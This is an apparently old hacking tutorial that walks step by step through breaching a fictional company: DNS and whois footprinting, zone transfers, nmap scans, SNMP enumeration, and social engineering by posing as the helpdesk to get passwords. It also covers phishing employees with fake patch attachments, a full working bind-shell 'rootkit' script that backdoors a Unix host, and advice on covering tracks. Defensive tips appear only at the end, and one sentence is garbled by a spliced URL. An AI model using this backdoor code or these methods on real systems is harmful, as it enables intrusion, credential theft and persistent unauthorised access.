Target

First of all, you need to decide who your target will be. script kiddies of course skip this step :
they go for the weakest victim they can find in a short time, by blindly scanning the internet for
open ports and applying exploits created by others.

We will, for this exercise, target an imaginary company, The Silly Software Company. In real
life, the target can be any system, for any reason.

Locate the target

When you've decided who your target will be, you'll have to be able to locate them on the
network - the internet, most often. That means you need to find some of their IP addresses, or at
least the IP address of 1 server or other host that belongs to your target company. If they have a
web server or a mail server, those addresses can easily be found, because they're needed for mail
transfer or for people to visit their web site. On the other hand, they may have their web site
hosted by an external company, or have their mail handled by their ISP's mail server, so you will
find those IP addresses in stead of the company's. Still, there are a number of ways to find an IP
address.

Of course, script kiddies - again - skip this step because they blindly strike out at the easiest or
nearest victim : they scan for any system that uses the software for which they've downloaded an
'exploit'.

If you can't find an IP address easily, the next step may provide some.

Network Reconnaissance or "footprinting'

Who is ...

The WHOIS databases are maintained by the domain name registrars. Those are the companies
that sell domain names such as google.com and bbc.co.uk. The information in these databases
can be accessed by tools on your computer (unix/linux : whois), on the WWWeb (example), or
via features in certain network administration tools, e.g. Sam Spade. The result may look like
this :

microsoft.com

Registrant:
Microsoft Corporation (MICROSOFT-DOM)
1 microsoft way
One Microsoft Way
redmond, WA 98052
US

Domain Name: MICROSOFT.COM

 Administrative Contact:
MICROSOFT CORPORATION msnhst@MICROSOFT.COM
One Microsoft Way
Redmond, WA 98052
US
425 882 8080 fax: 206 703 2641

Technical Contact:
MICROSOFT CORPORATION msnhst@MICROSOFT.COM
One Microsoft Way
Redmond, WA 98052
US
425-882-8080

Record expires on 03-May-2013.

Record created on 02-May-1991.
Database last updated on 21-Mar-2004 07:27:32 EST.

Domain servers in listed order:

DNS1.CP.MSFT.NET 207.46.138.20
DNS1.TK.MSFT.NET 207.46.245.230
DNS3.UK.MSFT.NET 213.199.144.151
DNS1.DC.MSFT.NET 64.4.25.30
DNS1.SJ.MSFT.NET 65.54.248.222

The information can be helpful to get the 'real life' picture of your target (company name,
address, phone number), possibly some additional eamil addresses, and so on. This can be used
for educated guesses at user names, passwords, email addresses, or for social engineering (see
further).

While people are usually good with words, computers are better with numbers. So a system has
been developed to translate words (server names, URL's, ...) into numbers (IP addresses), or vice
versa. This is called the Domain Name System, and it consists of a number of servers (DNS
servers, name servers) that hold databases with computer names and addresses. Computers
interrogate ("query") these DNS servers to find the address if they know the name, or find a
name when they know the address.

The whois info for a domain includes the name servers for this domain, so they're the next thing
you'll look in to ...

DNS

The DNS system can be queried by any computer, because otherwise your web browser would
not be able to find the IP address of 'www.playboy.com' when you're surfing the web, or your
email program would not be able to figure out where to send your email.
Consequently, you can interrogate the DNS system to find out about a company's servers and
their addresses. The tool you can use is nslookup, which can be found on any computer with
TCP/IP (except those of the Windows 9x family).

Say or target has a web site, www.sillysoftware.com. With

nslookup www.sillysoftware.com

We find that this site's IP address is 204.145.220.17. When we nslookup that address, we find it
belongs to My Dotcom. Apparently, the Silly Software website is hosted by My DotCom, and
we're not interested in them. So, lets see if we can find an other server that belongs to the Silly
Software Company, maybe a mail server.

pc01# nslookup
# sillysoftware.com

Non Authoritive answer

name : silly.com
addresses : 204.145.220.17

# set type=ANY
# silly.com

mail addr = ned.silly.com

Authoritive answer can be found from

silly.com nameserver = auth.ns.uu.net
silly.com nameserver : auth02.ns.uu.net

auth.ns.uu.net internet address =

222.145.220.213
auth02.ns.uu.net internet address = 81.86.235.2
mail.silly.com internet address = 207.204.120.8

And there it is : we find the silly software company's mail server at IP address 207.204.120.8

More from DNS ?

So far, we've used our own (default) DNS server and had it query the Silly Software DNS server.
That tels us the name and address of the DNS server that is Authoritive for the Silly Software
company's silly.com domain. Next , we could also have nslookup interrogate the Silly Software
nameserver, by setting ' server auth.ns.uu.net ' .

Sometimes, DNS servers allow you to download parts of their database. Normally, they should
only allow this to their backup / secondary dns servers ("zone transfer"), but unless the system
administrator configured the server to prohibit this, you are able to get the complete DNS
database of a server, with the ls -d command in interactive nslookup. You can redirect this
information to a file with >> redirection operator. That would give you a complete list of all host
names and addresses for a domain - or at least the ones the DNS server knows.

ls -d silly.org
[auth02.ns.uu.net]
$ORIGIN silly.com.
@ 6H IN SOA auth02.ns.uu.net.
hostmaster.uu.net. (
990570 ; serial
6H ; refresh
1H ; retry
2w6d ; expiry
6H ) ; minimum

6H IN NS auth02.ns.uu.net.
6H IN NS auth51.ns.uu.net.
6H IN A 216.222.35.189
sergey 6H IN A 207.204.120.25
scc_gate 6H IN CNAME scc-gate
scc-router 6H IN A 207.204.197.15
switch1 6H IN A 207.204.120.4
central 6H IN A 207.204.120.5
main_nt 6H IN A 207.204.120.9
mail 6H IN A 207.204.120.8
scc_router 6H IN CNAME scc-router
fw 6H IN A 207.204.120.1
scc-gate 6H IN A 207.204.120.6
www 6H IN A 204.145.220.17
uunet-gw 6H IN A 207.204.197.1

If a zone transfer fails (it should, really - zone transfers to foreign systems should be disabled by
the dns administrator. But sometimes they forget), you can still do a DNS query of type 'ANY',
or look for specific records (NS, MX), or just run the unix 'host' command against a list of
addresses, host names, or the domain name.

ix:~$ host microsoft.com

microsoft.com has address 207.46.197.32
microsoft.com has address 207.46.232.182
microsoft.com mail is handled by 10 maila.microsoft.com.
microsoft.com mail is handled by 10 mailb.microsoft.com.
microsoft.com mail is handled by 10 mailc.microsoft.com.

Back and Forth

Information from whois / RIPE gives you, amongst others, names and IP addresses of name
servers, and network ranges registered by the target company. DNS then reveals more names and
addresses. IP addresses can again be queried in whois, to reveal the registrant of the network
range they belong to. With some back and forth between whois and DNS, you end up with a nice
list of (public) networks, hosts, and their IP addresses. If the DNS administrator was careless
enough to include internal names and/or private addresses in his public DNS zone, you also get a
first look at what the internal LAN may look like.

When you run whois with an ip address, you find the network it belongs to, and other networks
owned by the same registrant. here is a Microsoft example again

ix:~$ whois 65.54.240.126

OrgName: Microsoft Corp

OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 65.52.0.0 - 65.55.255.255

CIDR: 65.52.0.0/14

So, going back and forth between RIPE (whois) and DNS, it's trivial to find (at least the public
parts) of a network.

traceroute

During the 'footprinting' process, you've located a number of machines or networks. At this
point, you may want to stage a Denial of Service Attack against one of those machines, if that
kind of thing is your goal.

You may also want to have a closer look at the company's network. Let's see which route an IP
packet will follow to go from our system to those machines : we trace a route (with traceroute on
Linux or tracert on Windows). This shows all routers between our system and the Silly Software
Company's name server. Including the router that connects them to the internet, maybe even their
firewall. We can do the same for their mail server, or any other server we know of.

traceroute / tracert

Tracing route to mail.silly.com [207.204.120.8] 30 hops max:

[...]
17 104 ms 103 ms 110 ms 0.so-3-0-0.XL1.NYC1.ALTER.NET
[152.63.27.29]
18 104 ms 103 ms 103 ms 0.so-0-0-0.XR1.NYC1.ALTER.NET
[152.63.19.85]
19 104 ms 123 ms 104 ms 207.ATM7-0.GW11.NYC1.ALTER.NET
[152.63.22.145]
20 107 ms 112 ms 107 ms scc-ext-gw.customer.alter.net
[156.131.7.202]
 21 * * * Timeout
22
[...]
Trace completed.

Tracing route to central.silly.com [207.204.120.5] 30 hops max:

[...]
18 102 ms 103 ms 102 ms 0.so-0-0-0.XR2.NYC1.ALTER.NET
[152.63.19.97]
19 110 ms 106 ms 103 ms 208.ATM6-0.GW11.NYC1.ALTER.NET
[152.63.22.149]
20 106 ms 107 ms 106 ms scc-ext-gw.customer.alter.net
[156.131.7.202]
21 * * * Timeout.

[...]
Trace completed.

Comparing both routes + the ip addresses of the servers leads to a preliminary conclusion that
156.131.7.202 may be their external gateway (the router that connects them to the internet).

This router is on the route to the hosts we're tracing, but we don't get any replies from beyond it.
This may indicate they have a router there that doesn't respond to the traceroute packets (a
firewall ?). More about how to traceroute hosts behind firewalls, or how to interpret the time-
outs, can be found in the man traceroute pages. By matching the traceroute starting port to the
number of hops, it might be possible to traceroute beyond the firewall. There exist also a version
of traceroute, and some other tools such as firewalker, to traceroute through a firewall.

War Dialing

In this day and age, who the fsck uses modems still ?
You'd be surprised. Modems are still quite frequently used : in older, yet-to-be-upgraded
networks, for specific applications where network connectivity is not (yet) feasible, as a cheap
solution for vendor remote assistance (eg to a PBX ..), ...

So if you're gonna be war dialing, you still may find a number of modems, connected to PBX's,
personal computers, dial-up servers, ... The interesting part about them is that these modem
connections by-pass any network firewall.

The best war dialing tools were developed for DOS PC's; ToneLoc is a fine example.

Wireless

With wireless networks all over the place, war dialing has been reinvented in the form of war
driving : looking around for wireless networks, then try to connect to them. Here is a proof of
concept. Other forms of wireless data communication (blue-tooth, infrared, ...), especially with
support for 'ad-hoc networking', also deserve attention.
Enumeration

So far, so good

So far, we've collected a number of hostnames and their IP addresses, and we have a rough idea
of the IP range The Silly Software Company is using, so we can make an educated guess at other
IP addresses they may be using. We have at least 1 email address so we can guess what other
email addresses may look like. We know a thing or to about the local network at the Silly
Software Company : at least the address of their external (border) router, maybe a bit more
(there's probably a firewall).

The next step it to collect as much additional information as possible. This is called 'enumerating
the network'. There are a lot of tools to be found on the web, but often they are just nice friendly
user interfaces for the techniques described below.

Websites ... may the source be with you

Web sites can be interesting ... First of all, you might find some people's names, email addresses,
and other information that can be useful for "social engineering'. The source code of the website
might even be more interesting, and it's readily available in your browser (although it me be
handier to just download the entire site, and use some text search and filtering tools to find what
you're after). Things of interest : scripts. Lazy or incompetent web developers resort to cheap
tricks in client-side scripts, eg. values in "hidden' fields or clear text user names and passwords in
e.g. a database connect string. Looking at a website's source can reveal interesting information.

tools : wget, grep, ...

Explore

You could first explore a bit more, e.g. by tracing routes to other addresses in the same class.
Hosts that don't reply to a ping might still become visible or reveal their hostname. It may also
give you a clearer picture of the IP ranges in use.

In this case, we might have assumed that the The Silly Software Company uses an IP range of 16
addresses (i.e. 14 hosts) or a range of 32 addresses (30 hosts). The DNS lookup, however,
revealed that there are more addresses in use : a set of addresses like 207.204.120.1 to
207.204.120.231. This suggests a complete class C network (nnn.nnn.nnn.1 to 254, subnet mask
255.255.255.0) because the next smaller subnet can only hold hosts (subnet mask
255.255.255.128). A couple of whois queries should be enough to shed some light in this.

Note that the DNS lookup also shows a couple of addresses outside this range. When we trace a
route to that additional router, scc-router or 207.204.197.15, we notice that it is behind the
external gateway - while the previous traces would stop at the external gateway :

19 104 ms 108 ms 105 ms 208.ATM6-0.GW11.NYC1.ALTER.NET

[152.63.22.149]
 20 106 ms 108 ms 107 ms scc-ext-gw.customer.alter.net
[157.130.7.202]
21 112 ms 108 ms 107 ms scc-router.silly.com [207.204.197.15]
Trace completed

This suggest the Silly Software Company has a second network, separate from the 207.204.120.0
network. As the router has address 16 - and routers usually get the first or last address in a range
- we assume for now that this is a 15 host subnet with addresses from 207.204.197.1 to
207.204.197.15, subnet mask 255.255.240.

We've also found the following interesting looking names :

name comment address comment 2

scc-ext- external
157.130.7.202 on the ISP's network ?
gw.customer.alter.net gateway ?
fw firewall ? 207.204.120.1
another apparently in a different address
scc-router 207.204.197.15
router ? range ...
another routers usually have addresses at the
scc-gate gateway / 207.204.120.6 start or the end of a range, so this
router ? would be unusual
another
switch1 gateway / 207.204.120.4
router ?
uunet-gw 207.204.197.1
fwext 207.204.197.10
routers usually have addresses at the
--- --- 207.204.120.254 start or the end of a range, so we could
check this one as well

Port Scan

We can now use a port scanner to see what ports are open (or blocked, or filtered) on the hosts
we already know. This will give us information about what these machines are supposed to be
doing, and it may reveal some possible points of attack. nmap (Network Mapper)is a popular
port scanner. It's output may look something like this :

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2004-03-21

12:03
Interesting ports on www.my.com (82.283.162.210):
(The 1648 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
26/tcp open unknown
53/tcp open domain
 80/tcp open http
110/tcp open pop-3
143/tcp open imap
443/tcp open https
995/tcp open pop3s

Nmap run completed -- 1 IP address (1 host up) scanned in 135.290

seconds

nmap can also scan IP ranges, so it can be used to find other hosts on the network as well. Use
your knowledge of IP addressing and subnetting to define a suitable range, or (if you have the
time or lack the knowledge) scan everything.

On top of that, and among other features, nmap can make a first guess of the operating system
used on the hosts you're scanning, so there's another interesting piece if information out there.

Here's a summary of a number of scans. Nmap has several options, all of which can reveal
something particular about the targeted network.

# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as:

nmap -sS -O -P0 -R -p1352 -oN log 207.204.120.1-15

Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1):

PORT STATE SERVICE
1352/tcp filtered lotusnotes

Device type: general purpose

Running: Microsoft Windows NT/2K/XP
OS details: Microsoft Windows NT 4.0 SP 6a + hotfixes
[repeated at every host]

Interesting ports on firewall2.silly.com (207.204.120.2):

(The 65535 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
747/tcp filtered fujitsu-dev
1352/tcp closed lotusnotes

Interesting ports on 207.204.120.3:

(The 65535 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
747/tcp filtered fujitsu-dev
1352/tcp closed lotusnotes
1723/tcp filtered pptp

Interesting ports on switch1.silly.com (207.204.120.4):

(The 65535 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
183/tcp filtered ocbinder
1352/tcp filtered lotusnotes
 Interesting ports on central.silly.com (207.204.120.5):
(The 65535 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
1352/tcp open lotusnotes
5631/tcp open pcanywheredata
5632/tcp closed pcanywherestat
5900/tcp open vnc

Device type: general purpose

Running: Sun Solaris 2.X|7, Microsoft Windows NT/2K/XP
OS details: Sun Solaris 2.6 - 7 (SPARC), Microsoft Windows NT 4.0 SP
6a + hotfixes

Interesting ports on scc_gate.silly.com (207.204.120.6):

(The 65535 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
180/tcp filtered ris
747/tcp filtered fujitsu-dev
1352/tcp filtered lotusnotes

Interesting ports on 207.204.120.7:

PORT STATE SERVICE
1352/tcp filtered lotusnotes

Interesting ports on mail.silly.com (207.204.120.8):

PORT STATE SERVICE
1352/tcp open lotusnotes

Interesting ports on main_nt.silly.com (207.204.120.9):

PORT STATE SERVICE
1352/tcp filtered lotusnotes

[etc ..]

All 65535 scanned ports on 207.204.120.24 are: closed

All 65535 scanned ports on sergey.silly.com (207.204.120.25) are:

closed

All 65535 scanned ports on 207.204.120.26 are: closed

All 65535 scanned ports on 207.204.120.27 are: closed

Interesting ports on 207.204.120.28:

(The 65535 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
1650/tcp filtered nkd

All 65535 scanned ports on 207.204.120.29 are: closed

All 65535 scanned ports on 207.204.120.30 are: closed

# Nmap run completed at Sat Mar 27 14:42:47 2004 --

 30 IP addresses (30 hosts up) scanned in 3409.766 seconds

The result is not bad: we get a list of hosts in the Silly Software network, their IP address, and a
number of interesting ports, some even with Remote Administration Services already listening.
We can assume the have a firewall, because nmap evaluates a number of ports as 'filtered'. And
of course, the hostname firewall2.silly.com is a dead giveaway :-) .

One more interesting point that show up in the nmap output : machine with IP address
207.204.120.25 is called sergey.silly.com. Sergey is a man's name. Could they be using public IP
addresses for (at least some of ) their employees workstations ? And are workstations named
after their user ?

Maybe we can send an email to sergey@silly.com, see what gives.

Also, they have that second 207.204.197.0 / 28 subnet that could be worth a closer look. And the
DNS resolution of some of the scanned addresses turn out interesting sounding names such as
'fw' (firewall ?), 'fwext' (external firewall ?), 'switch' (a switch with remote management ? an
other router ?) and 'main_nt' (a Windows NT domain controller ?) ...
And so on ...

Banner Grabbing

Now that you know the open ports, you can try to find out what software is being used for those
services. A quick and easy way to do that is to telnet to the host on that port. Sometimes, the
software replies with some sort of welcome message, or at least a command prompt, that may tell
what software is behind it. Some ports scanners will do this for you (recent versions of nmap do),
or you may look on the internet for banner grabbing tools. Nessus is a know name here. Nessus
can also "test" the services in question to see if they are vulnerable to common exploits. Saves
you the trouble of identifying vulnerabilities and finding suitable exploits yourself.

Here are some examples of what 'banners' may look like, and what they tell you.
You may find yourself welcome to a Linux system

Welcome to SuSE Linux 7.1 kernel 2.2.14

Have a lot of fun

or an old Lotus Notes Domino Server

SMTP gateway for Lotus Domino r 4.6

_
or a pop 3 server ...

+OK POP3 [cppop 9.9] at [209.51.159.225]

This information can later be used to look up to what kind of attack, exploit, ... this particular
version of that specific software packet is vulnerable. Of course, things like VPN and
PCAnywhere services are tempting found during a portscan : all you need for those is a VPN or
PCAnywhere client, and you can check whether the system administrator forgot to remove the
default accounts and change the factory settings. If so, these services are an open door into the
network.

The filtered ports tell you which services are running on the host, but they're firewalled - it may
be complicated to connect to them. The response may refer to the host itself, or from a NAT
router / firewall between you and the scanned target. Ports that are closed tell you that the
machine is not used for the services these ports represent, or that a firewall is blocking any
attempt to connect to these ports without telling the system that initiates the connection.

snmp

snmp, the simple network management protocol, is a protocol to monitor devices remotely, over
the network. System administrators use it to monitor routers, switches, computers, printers, ... If
the snmp service is accessible from the outside, it can be used to collect a complete description
of the system in question. So it's worth checking. snmp services are usually configured with a
default "public" community that allows read access. The community name serves as a password,
and sys admins forget to change it, so ...
snmp version 3 supports more secure authentication mechanisms. Maybe it's time to upgrade - or
at least check your community names.

snmp uses UDP so it doesn't usually show up in a default (tcp) port scan. You can explicitly scan
UDP ports, or just try to access snmp on the target(s) and see if it responds.

for target in $list_of_targets; do

snmpget -v1 -c public $target system.sysUpTime.0
done

For those hosts where you can access snmp, you can use snmpwalk or bulksnmpwalk to walk the
entire snmp tree.

for item in $list_of_snmp_targets; do

snmpwalk $item ;
done
snmp data is organized in modules ("MIB"), and depending on the system you're interrogating, it
is useful to specify a module to get specific information. For instance, you can specify the
LanMgr-Mib-II-MIB - Windows LanManager MIB to retrieve shared directories, sessions, user
account names, ... from a Windows system. On routers, you may be interested in the snmp ip
subtree, to find out about routing tables and address translation.

Some samples of snmp output :

• (partial) description of router

• (partial) description of a Linux system
• (partial) description of a Windows system
• a list of user accounts on a Windows system

Service specific information

With the information gathered so far, you may have discovered new ways to find out more about
the network you're aiming at. For instance, if you found that some hosts are using netbios, this
can be used to retrieve additional information about user names, computer names, possibly also
network shares and so on. This page shows netbios vulnerabilities in this respect.

To get some insight in the LAN layout, you might send an email to info@silly.com, get a reply,
and read the headers to see how that reply got from the sender (with his IP address and/or host
name) to the mail servers. Or use one of the email addresses you've found so far.

Received: from PC_212 (adsl2256.ppp.my.com [207.201.179.14])

Asking for a receipt, and look at the headers when you get it, can also tell you a few things about
how mail reaches its destination at The Silly Software Company and thus (partially) illustrate the
layout of the network.

Social Engineering

So far, we've only collected information that is readily available, because the internet as it is
would nor be able to function without it, and information that can be readily retrieved if sloppy
sysadmins forget to take precautions against it. Next, all we did is put 2 and 2 together. To find
out more, we'd have to either target specific holes in the security, or use so-called "Social
engineering"

Social Engineering is kind of an euphemism. To fill the gaps in the information you've collected
so far, you may resort to dirty tricks such as call the receptionist at Silly Software Company, tell
her you're the helpdesk and could she please tell you her password because you need to check
something. She might just give it. She may also tell you the login name and password of her boss
who is such a moron and she always needs to help him whenever he's at a loss with some
computer thing.
You may also start hanging out at the place where the Silly Software Techies hang out for lunch,
for happy hour, or on Friday after work, and hear them tell stories about how stupid their
colleagues are, or so. Stories that may contain interesting details about the IT systems in the
company. Interesting details that help you understand what your target looks like, and where the
weak points may be.

An other approach could be to visit news groups and forums, and look for entries related to the
company your targeting, or names of its employees. One of the network administrators might
have asked for help regarding a problem that could be of particular interest.

So, social engineering has nothing to do with engineering, nothing to do with network protocols
or data communication - it's just exploiting human weakness, but it's called social engineering to
make it fit the picture of the intelligent, technology oriented wizz that can get in to any system.

Nonetheless, it goes to show that the human factor can be one of the weak points in a well
protected system, so it's good to be aware of it.

Point of Attack

At this point, we have an idea what the local network at the Silly Software Company may look
like, we know where on the internet we can find them, we have some indications of the software
they're running, we have some background information about the company, and maybe it's
employees and so on. Time to decide how to proceed. A lot depends on what you're after.

We could target one of the servers, e.g. the mail server or the system with hostname 'gate', either
as the final goal or as a way to penetrate deeper in the network (they may accept actions from
their own servers that they don't accept from external systems, so some level of control over that
server may get us further ...).

Mail servers are a popular target, because they hold user accounts : logins, passwords. They must
be publicly accessible for mail to be delivered, and they are also trusted by the other hosts on the
network, so they can be used as point of entry. They also hold the mail messages, if that's what
you're after. Or mail messages may contain information that can help you penetrate deeper in the
network.

We have some information about ports that we can connect to (and the services that will reply,
maybe the operating systems, etc). That may open opportunities, if there are known security
issues with that software. In a case like this, it may be worth a try to get a pcAnywhere client or
VNC client and try to connect to the hosts listening for PCAnywhere or VNC. If the network
administrator did a sloppy job, some factory settings (default users, passwords, ...) may still be
active, and you walk right in.

Method of Attack

The method of attack will be adapted to the point of attack, discussed previously, because it is, at
least partially, dictated by the software you find on the target system. There are several ways.
Maybe you can locate and retrieve the password file, so when you have that, you can try to
connect to the system as a legitimate user, and take it from there. Or maybe one of the services is
susceptible to a buffer overflow exploit, which might allow you to open a shell (a command
prompt) from where you can access the system, maybe create a superuser account for yourself,
or so. There's also root kits, collections of scripts that will help you get access with 'root' (system
administrator) privileges on the system you're targeting. Or maybe you have sufficient access to
drop a 'Trojan Horse' on the system, that will let you right in next time.

You're first attack may be also aimed at just collecting additional information for future attacks :
grab a password list, find a way to get a packet sniffer on the network to read the data that are
being transmitted, etc.

An other typical method is to gain access to the network with limited privileges, as guest, or with
anonymous FTP or something similar, then apply some tricks or exploit some sysadmin
sloppiness to upgrade your account, upload a root kit, steal the password file, ... in order to get
control ("own the system"). Here's a descriptin of how an ftp server with some configuration
mistakes resulted in complete 'root' access to a server : How we defaced apache.org.

Leave the back door open

After you've gone through all this trouble, you don't want to shut yourself out, so you'll leave a
way to sneak in more easily next time. Create a user account (and remember the password), leave
a back door program that you can connect to without hassle, etc.

Tools for this kind of activity can be readily found on the web. Of course, you will have to trust
the guy who created them : his virus
crehttp://www.dataloss.net/papers/how.defaced.apache.org.txtation tool or trojan construction
tool may well include a few lines of code that create a backdoor on your own system as well. :-)

Here are a couple of examples I found without too much trouble. I haven't tried them so I don't
know if they will work. I iInclude them because they're easy to understand examples of how
features of the operating system on the target can be exploited if the sys admin is a bit naive. For
systems with less naive sysadmins, I'm sure there are more sophisticated tricks out there.

Windows NT

Windows NT (and other Microsoft Windows systems) still know the autoexec.bat. This is a
script that is automatically executed every time the system (re-)boots. They also have the AT
command, that can be used to have commands/scripts/programs executed at a given date/time or
with a given schedule. This is often considered God's gift to crackers, as it can be used to have
commands, scripts, programs, .... executed on the targeted system. One can imagine that an
intruder tries to add a few lines to the autoexec.bat, then waits for the system to be rebooted (or
get it to reboot by causing it to crash).

An other fine tool is getadmin.exe, a program that uses a flaw in Windows NT to add the user
account of your choice to the Administrators group, thus giving that account full Administrator
privileges. getadmin.exe is a bit outdated (the flaw in Windows is patched) - but you get the idea.
And there are probably other tools out there.

An other way of doing it may be like this : hacking NT, using FTP to upload files to the targeted
machine.

Once you are Administrator, there is no limit to what you can do. With VBS, you can execute
any administrator task on the remote machine, including creating new accounts (in case the one
you're using is found and removed), or changing passwords.

Linux / Unix

The following trick is supposed to work on Unix / Linux systems : upload a script that contains
the source code (in C) of a backdoor program, and some shell commands to compile and run it
on the targeted system, using that systems own c compiler (gcc, usually present by default on any
Linux / Unix-like system).

#!/bin/sh # Fearless Rootkit R-Type v0.1

# Coded by Merlion
#
# If you do, you do so at your OWN risk

cat > /tmp/rootd.c << EOF

#include &ltstdio.h>
#include &ltstring.h>
#include &ltnetdb.h>
#include &ltnetinet/in.h>
#include &ltsys/types.h>
#include &ltsys/socket.h>
#include &ltunistd.h>

void die(char *error);

main(int argc, char **argv) {
pid_t pid, sid;
int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec,
sockopt, sockcli, socklen;
unsigned short int mcon;
unsigned short int port;
char *rbuf, *rmode;
struct sockaddr_in Client, Server;
if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error
creating socket");
if (argc != 3) die("Usage");
memset(&Server, 0, sizeof(Server));
Server.sin_family=AF_INET;
port=905;
mcon=5;
Server.sin_port=htons(port);
Server.sin_addr.s_addr=htonl(INADDR_ANY);
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt,
sizeof(sockopt)) < 0)
 die("No socket options set");
if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) !
= 0)
die("Could not bind socket");
if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");
pid=fork();
if (pid < 0) die("Initial fork() failed");
if (pid>0) exit(0);
if ((chdir("/")) < 0) die("Could not set working directory");
if ((setsid()) < 0) die("setsid() failed in creating daemon");
umask(0);
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);

while(1) {
socklen=sizeof(Client);
if ((sockcli=accept(sock, (struct sockaddr *) &Client,
&socklen)) < 0) exit(1); /* syslog msg here still */
clipid=getpid();
serpid=fork();
if (serpid > 0)
waitpid(0, &stat, 0);
dup2(sockcli, 1);
execl("/bin/sh","sh",(char *)0); }
close(sockcli); }
void die(char *error) {
fprintf(stderr, "%s\n", error);
exit(1); }

EOF

gcc -o /bin/rootd /tmp/rootd.c

rm -f /tmp/rootd.c
/bin/rootd

echo "Rootd successfully installed"

exit 0

more ...

More elaborate stuff can be found on the Web, like here:

• Fearless
• http://www.packetstormsecurity.org/UNIX/penetration/rootkits/ : Unix tools
• http://www.packetstormsecurity.org/NT/ : Windows NT tools
• more tutorials, howto's, and tools

Next ...
So, you have access to the Silly Software Company's resources. Now what ? The decent thing to
do would be to warn them about the security holes in their system, e.g. by sending the system
administrator an email explaining what you've done. If you send the mail from within their
system, like from the sys admin's own email account, it's more impressive, and it proofs you're
not joking.

The black hat approach would now be to use their system for your own benefit, like steal
information, or install an FTP server to distribute 'warez', or use their computers as zombies for a
Denial of Service attack against your next victim, or use their mail system to start spreading
viruses, or run your next intrusion from one of their computers so that it won't be traced back to
you, or whatever.

Typically, the intruder will also try yo cover his tracks by modifying log files, create hidden files
or folders to cover any stuff that has been uploaded, or place his tools in folders with normal
sounding names or use file names that may look as if they belong to the system. A system
administrator would need to know his system quite well to notice these changes.

Shortcuts

There are a couple of ways to shortcut the above procedure. For starters, it helps if you're already
on the inside. 80 % of all 'intrusions' are done from within, i.e. by employees. That saves the
trouble of having to penetrate the network from the outside. Also, employees have accounts
already, so their goal would be to find a way to get superuser privileges (privilege escalation) , or
find holes, inconsistencies, mistakes in the access privileges that would allow them access to
information they were not intended to see or modify. At the least, they have only to look at their
own account to see what format usernames and passwords have, which might help.

Penetrating a network is also easier if someone lets you in. You may send emails to The Silly
Software Company's employees and make it look as if they come from the system administrator
(you know his email address from the DNS lookup !). If you can convince them to execute a
certain program ("here's a patch that will repair the problem you've had with your computer. just
open the attachment" - that should work : everyone has had problems with computers before ...),
you can try and have them install a backdoor that you can use to get in.

Conclusion

The availability of DNS and RIPE information is part of the design. DNS, RIPE ('whois'), and
other online databases are necessary for the internet to function. There is also nothing wrong
with servers having publicly accessible ports / services - you can't run a web server without
allowing people to connect to its port 80. On the other hand, all this information combined can
tell an attacker more than you expect. Lists of networks, IP addresses and routes may allow an
attacker to draw a map of your networks and make educated guesses about additional private
networks, routes, and possibly vpn tunnels. Private IP addresses can be used for address spoofing
so packets appear to be coming from a trusted network. User names and email addresses can be
used in social engineering or to make educated guesses about account names. A list of installed
software or running services, and their patch level (eg from snmp) greatly simplifies the search
for vulnerabilities or exploits. If someone has a list of user accounts, all he needs to do is find a
matching password - way easier and faster than having to guess (brute-force, word list, ...) user
name - password combinations.

So, while you can not avoid having some info publicly accessible, a security aware system
administrator should really consider what information is to be made public, and to whom - and
take steps to implement that in stead of accepting whatever defaults came with the package. A
few simple steps will greatly reduce your exposure :

• use generic email addresses (eg ict_dept@silly.com in stead of jean-

claude.vandamme@silly.com)
• don't let DNS servers do zone transfers to other servers except your own
• don't show internal hosts / addresses in public DNS. Use separate servers for internal and
external addresses. Don't let public DNS servers do recursive lookups on your private
DNS servers.
• replace those default passwords (and snmp communities)
• disable services you don't need
• use a firewall and access control lists to limit communication to only those source and
destination addresses / networks / hosts that need to be talking to each other
• log connection and log-in attempts and check the logs regularly